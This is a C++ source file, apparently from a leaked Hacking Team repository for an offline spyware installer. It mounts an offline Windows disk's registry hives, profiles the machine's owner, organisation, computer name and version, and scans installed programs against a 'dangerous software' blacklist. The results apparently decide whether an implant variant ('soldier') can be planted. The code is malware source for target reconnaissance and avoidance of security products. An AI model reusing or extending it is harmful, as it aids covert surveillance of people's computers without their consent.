OfflineInstall/Functions_OS_WIN.cpp from hackedteam/vector-offline

OfflineInstall/Functions_OS_WIN.cpp
Summary

Maintainability

Test Coverage

Issues
#include "stdafx.h"
#include "commons.h"
#include "Functions_OS.h"
#include "Functions_Users.h"
#include "Functions_RCS.h"

BOOL Time1970ToSystemTime(DWORD toffset, SYSTEMTIME *sys_time)
{
    SYSTEMTIME age_time_s;
    FILETIME age_time_f;
    ULARGE_INTEGER nanosec_time, nanosec_offset;

    memset(&age_time_s, 0, sizeof(age_time_s));
    age_time_s.wDay = 1;
    age_time_s.wMonth = 1;
    age_time_s.wYear = 1970;
    if (!SystemTimeToFileTime(&age_time_s, &age_time_f))
        return FALSE;

    nanosec_offset.QuadPart = (unsigned int)toffset;
    nanosec_offset.QuadPart *= 10000000;

    nanosec_time.HighPart = age_time_f.dwHighDateTime;
    nanosec_time.LowPart = age_time_f.dwLowDateTime;
    nanosec_time.QuadPart += nanosec_offset.QuadPart;

    age_time_f.dwHighDateTime = nanosec_time.HighPart;
    age_time_f.dwLowDateTime = nanosec_time.LowPart;

    return FileTimeToSystemTime(&age_time_f, sys_time);
}

DWORD WIN_GetArch(os_struct_t *os_info)
{
    WCHAR wow64_path[MAX_PATH];
    HANDLE hfile;

    swprintf_s(wow64_path, MAX_PATH, L"%s%s", os_info->drive, L"windows\\syswow64\\");
    hfile = CreateFile(wow64_path, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
    if (hfile != INVALID_HANDLE_VALUE) {
        CloseHandle(hfile);
        return 64;
    }

    return 32;
}

BOOL WIN_IsSupported(os_struct_t *os_info)
{
    if ( !wcscmp(os_info->curr_ver, L"5.0") || // Windows 2000
         !wcscmp(os_info->curr_ver, L"5.1") || // Windows XP
         !wcscmp(os_info->curr_ver, L"5.2") || // Windows 2003
         !wcscmp(os_info->curr_ver, L"6.0") || // Windows Vista o 2008
         !wcscmp(os_info->curr_ver, L"6.1") || // Windows 7
         !wcscmp(os_info->curr_ver, L"6.2") || // Windows 8
         !wcscmp(os_info->curr_ver, L"6.3"))   // Windows 8.1
        return TRUE;

    return FALSE;
}

// Se c'e' un software pericoloso torna uno dei seguenti valori
// #define BL_BLACKLISTED 0
// #define BL_SAFE 1
// #define BL_ALLOWSOLDIER 2
DWORD WIN_IsBlackListedSoftware(os_struct_t *os_struct)
{
    HKEY hKeyUninstall = NULL, hKeyProgram = NULL;
    DWORD dwordval, index, len;
    WCHAR stringval[128], product[256];
    ULONG uSamDesidered = KEY_READ;
    WCHAR software_hive_path[MAX_PATH];
    WCHAR system_root[MAX_PATH];
    HANDLE hfile;
    DWORD i, t_ret;
    DWORD ret_val = BL_SAFE;

    ZeroMemory(os_struct->bl_software, sizeof(os_struct->bl_software));

    // Monta l'hive SOFTWARE
    swprintf_s(system_root, MAX_PATH, L"windows\\system32");
    swprintf_s(software_hive_path, MAX_PATH, L"%s%s%s", os_struct->drive, system_root, L"\\config\\software");
    
    hfile = CreateFile(software_hive_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
    if (hfile == INVALID_HANDLE_VALUE) {
        swprintf_s(system_root, MAX_PATH, L"winnt\\system32");
        swprintf_s(software_hive_path, MAX_PATH, L"%s%s%s", os_struct->drive, system_root, L"\\config\\software");
        hfile = CreateFile(software_hive_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
        if (hfile == INVALID_HANDLE_VALUE)
            return BL_BLACKLISTED;
    }
    CloseHandle(hfile);
    if (RegLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\", software_hive_path) != ERROR_SUCCESS) 
        return BL_BLACKLISTED;
    
    // Al primo giro guarda quelli a 32 poi quelli a 64bit 
    for (i=0; i<2 && ret_val != BL_BLACKLISTED; i++) {
        do {
            index = 0;
            if (i == 0) {
                if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, uSamDesidered, &hKeyUninstall) != ERROR_SUCCESS) 
                    break;
            } else {
                if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, uSamDesidered, &hKeyUninstall) != ERROR_SUCCESS) 
                    break;
            }

            while(1) {
                if(hKeyProgram) {
                    RegCloseKey(hKeyProgram);
                    hKeyProgram = NULL;
                }

                len = sizeof(stringval) / sizeof(stringval[0]);
                if(RegEnumKeyExW(hKeyUninstall, index++, stringval, &len, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) break;

                if(RegOpenKeyExW(hKeyUninstall, stringval, 0, KEY_READ, &hKeyProgram) != ERROR_SUCCESS) continue;

                if(!RegQueryValueExW(hKeyProgram, L"ParentKeyName", NULL, NULL, NULL, NULL)) continue;

                len = sizeof(dwordval);
                if(!RegQueryValueExW(hKeyProgram, L"SystemComponent", NULL, NULL, (LPBYTE)&dwordval, &len) && (dwordval == 1)) continue;

                len = sizeof(stringval);
                if(RegQueryValueExW(hKeyProgram, L"DisplayName", NULL, NULL, (LPBYTE)stringval, &len)) continue;

                wcsncpy_s(product, sizeof(product) / sizeof(product[0]), stringval, _TRUNCATE);

                len = sizeof(stringval);
                if(!RegQueryValueExW(hKeyProgram, L"DisplayVersion", NULL, NULL, (LPBYTE)stringval, &len)) {
                    wcsncat_s(product, sizeof(product) / sizeof(product[0]), L"   (", _TRUNCATE);
                    wcsncat_s(product, sizeof(product) / sizeof(product[0]), stringval, _TRUNCATE);
                    wcsncat_s(product, sizeof(product) / sizeof(product[0]), L")", _TRUNCATE);
                }

                t_ret = IsDangerousString(product, os_struct); 
                if (t_ret == BL_ALLOWSOLDIER) 
                    ret_val = BL_ALLOWSOLDIER;                
                else if (t_ret == BL_BLACKLISTED) {
                    ret_val = BL_BLACKLISTED;
                    _snwprintf_s(os_struct->bl_software, sizeof(os_struct->bl_software)/sizeof(os_struct->bl_software[0]), _TRUNCATE, L"%s", product);
                    break;
                }
            }
        } while(0);

        if(hKeyUninstall) {
            RegCloseKey(hKeyUninstall);
            hKeyUninstall = NULL;
        }
    }

    RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\");
    return ret_val;
}

BOOL RecognizeWindowsOS(WCHAR *drive_letter, os_struct_t *os_struct)
{
    WCHAR software_hive_path[MAX_PATH];
    WCHAR system_hive_path[MAX_PATH];
    WCHAR system_root[MAX_PATH];
    HANDLE hfile;
    DWORD *temp_date;
    DWORD *temp_bias;

    // Vede se esiste l'hive (XP, Vista, 2000, etc.)
    // Cerca prima in \Windows e poi in \WinNT
    // Deve trovare sia SYSTEM che SOFTWARE per proseguire
    swprintf_s(system_root, MAX_PATH, L"windows\\system32");
    swprintf_s(system_hive_path, MAX_PATH, L"%s%s%s", drive_letter, system_root, L"\\config\\system");
    
    hfile = CreateFile(system_hive_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
    if (hfile == INVALID_HANDLE_VALUE) {
        swprintf_s(system_root, MAX_PATH, L"winnt\\system32");
        swprintf_s(system_hive_path, MAX_PATH, L"%s%s%s", drive_letter, system_root, L"\\config\\system");
        hfile = CreateFile(system_hive_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
        if (hfile == INVALID_HANDLE_VALUE)
            return FALSE;
    }
    CloseHandle(hfile);
    swprintf_s(software_hive_path, MAX_PATH, L"%s%s%s", drive_letter, system_root, L"\\config\\software");
    hfile = CreateFile(software_hive_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL);
    if (hfile == INVALID_HANDLE_VALUE)
        return FALSE;
    CloseHandle(hfile);

    // Monta l'hive
    if (RegLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SYSTEM\\", system_hive_path) != ERROR_SUCCESS) 
        return FALSE;

    if (RegLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\", software_hive_path) != ERROR_SUCCESS) {
        RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SYSTEM\\");
        return FALSE;
    }

    os_struct->os = WIN_OS;
    memcpy(os_struct->system_root, system_root, sizeof(system_root));
    ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"ProductName", NULL, &(os_struct->product_name));
    ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"CSDVersion", NULL, &(os_struct->csd_version));
    ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"RegisteredOwner", NULL, &(os_struct->reg_owner));
    ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"RegisteredOrganization", NULL, &(os_struct->reg_org));
    ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"ProductId", NULL, &(os_struct->product_id));
    ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"CurrentVersion", NULL, &(os_struct->curr_ver));

    ReadRegValue(L"RCS_SYSTEM\\ControlSet001\\Control\\ProductOptions", L"ProductType", NULL, &(os_struct->product_type));
    ReadRegValue(L"RCS_SYSTEM\\ControlSet001\\Control\\ComputerName\\ComputerName", L"ComputerName", NULL, &(os_struct->computer_name));

    ReadRegValue(L"RCS_SYSTEM\\ControlSet001\\Control\\TimeZoneInformation", L"ActiveTimeBias", NULL, (WCHAR **)&temp_bias);
    if (temp_bias) {
        os_struct->time_bias = *temp_bias;
        SAFE_FREE(temp_bias);
    } else
        os_struct->time_bias = 0;

    ReadRegValue(L"RCS_SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"InstallDate", NULL, (WCHAR **)&temp_date);
    if (temp_date) {
        Time1970ToSystemTime(*temp_date, &(os_struct->install_date));
        SAFE_FREE(temp_date);
    }

    os_struct->arch = WIN_GetArch(os_struct);
    os_struct->is_supported = WIN_IsSupported(os_struct); // Va chiamata per ultima...

    RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SOFTWARE\\");
    RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SYSTEM\\");

    os_struct->is_blacklisted = WIN_IsBlackListedSoftware(os_struct);

    return TRUE;
}